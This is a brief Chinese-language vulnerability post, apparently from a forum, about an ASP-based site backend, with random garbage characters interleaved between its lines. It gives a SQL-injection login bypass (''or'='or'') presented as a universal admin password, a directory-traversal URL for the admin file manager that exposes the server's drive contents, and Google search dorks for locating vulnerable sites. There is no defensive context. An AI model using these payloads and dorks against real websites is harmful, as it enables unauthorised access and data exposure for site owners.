后台万能密码 'or'='or'
/ L! U. n4 i1 I4 w. S# ]
) w* H* H1 t$ q/ T2 ~5 T后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 }/ U/ X& g/ aadmin/uploadfile.asp?currentFolder=/upfiles/../
5 ?- Z% w8 `2 {, C
. K u9 N. i/ F漏洞证明:- E4 K0 W1 s* [/ r# M
0 p- Z1 y! v7 u" _1 a
谷歌:inurl:type.asp?id=1 新闻中心
9 ?- T- L5 B* G4 t1 g7 `或者 :inurl:download_ok.asp?
! ^. V5 t* k# u( Y+ T3 B
/ u& L$ @- w4 V |